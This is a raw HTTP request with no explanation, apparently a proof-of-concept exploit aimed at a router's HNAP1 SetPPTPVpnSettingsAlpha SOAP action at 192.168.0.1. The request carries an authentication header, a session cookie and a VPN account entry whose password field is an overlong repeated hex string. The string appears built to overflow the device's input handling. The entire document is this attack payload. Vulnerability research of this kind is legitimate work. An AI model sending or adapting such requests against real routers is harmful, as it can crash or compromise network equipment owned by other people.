POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/xml
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/xml
SOAPACTION: "http://purenetworks.com/HNAP1/SetPPTPVpnSettingsAlpha"
HNAP_AUTH: 46D0DB15D25BE90EC65B7B25DE94D4AD 1676880010
Content-Length: 681
Origin: http://192.168.0.1
Connection: keep-alive
Referer: http://192.168.0.1/PPTPVPN.html
Cookie: uid=VK7UEwmgY2

<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<SetPPTPVpnSettingsAlpha> 
	<pptp>true</pptp>
	<authtype>
		<chap/>
		<mschap/>
	</authtype>
	<encrtype>true</encrtype>
	<isolation/>
		<account>
			<entry>
				<name>1</name>
				<password>8b51767b8abe4347aab6babb8884ab841651767b8abe4347aab60dbb88ffab841651767b8abe4347aab60dbb88ffab841651767b8abe4347aab60dbb88ffab84</password>
				<hostid>3</hostid>
				<enable>true</enable>
			</entry>
		</account>
</SetPPTPVpnSettingsAlpha>
</soap:Body>
</soap:Envelope>